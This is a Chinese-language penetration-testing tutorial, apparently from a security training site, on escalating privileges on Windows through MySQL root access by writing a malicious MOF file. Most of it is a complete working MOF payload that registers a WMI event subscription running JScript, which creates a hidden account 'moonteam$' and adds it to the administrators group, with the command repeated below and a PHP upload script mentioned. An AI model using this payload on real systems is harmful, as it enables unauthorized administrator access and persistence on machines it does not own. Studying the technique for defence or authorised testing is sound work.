[原创]WEB安全第六章提权篇12 mof提权
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第六章提权篇12 mof提权
1、mof是什么
托管对象格式 (MOF) 文件是创建和注册提供程序、事件类别和事件的简便方法。在 MOF 文件中创建类实例和类定义后,可以对该文件进行编译。编译 MOF 文件将在 CIM 储存库中注册所有的类定义和实例。之后,提供程序、事件类别和事件信息便可由 便可由 WMI 和 Visual Studio Analyzer 使用。 在 MOF 文件中创建提供程序、事件类别和事件类的实例,并且定义想要分析的自定义对象,之后,就可以对该文件进行编译
2、mof提权的原理:
mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做”托管对象格式”其作用是每隔五秒就会去监控进程创建和死亡。
其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。
3、modf提权过程
mof文件
[php]
mof文件
<h1>pragma namespace("\\.\root\subscription")</h1>
instance of __EventFilter as $EventFilter
{
EventNamespace = "Root\Cimv2";
Name = "filtP2";
Query = "Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Second = 5";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
Name = "consPCSV2";
ScriptingEngine = "JScript";
ScriptText =
"var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add\")";
};
instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};
[/php]
使用脚本提权
http://www.demoasp.com/mof.php
填写好mysq的账号和密码
文件会自动写到good目录下
![[原创]WEB安全第六章提权篇12 mof提权](https://www.moonsec.com/wp-content/uploads/2019/11/image001-33.png)
![[原创]WEB安全第六章提权篇12 mof提权](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
net.exe user moonteam$ xxx12456 /add && net localgroup administrators moonteam$ /add
![[原创]WEB安全第六章提权篇12 mof提权](https://www.moonsec.com/wp-content/uploads/2019/11/image002-32.png)
![[原创]WEB安全第六章提权篇12 mof提权](https://www.moonsec.com/wp-content/uploads/2019/11/image003-23.png)
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/450.html
mOon 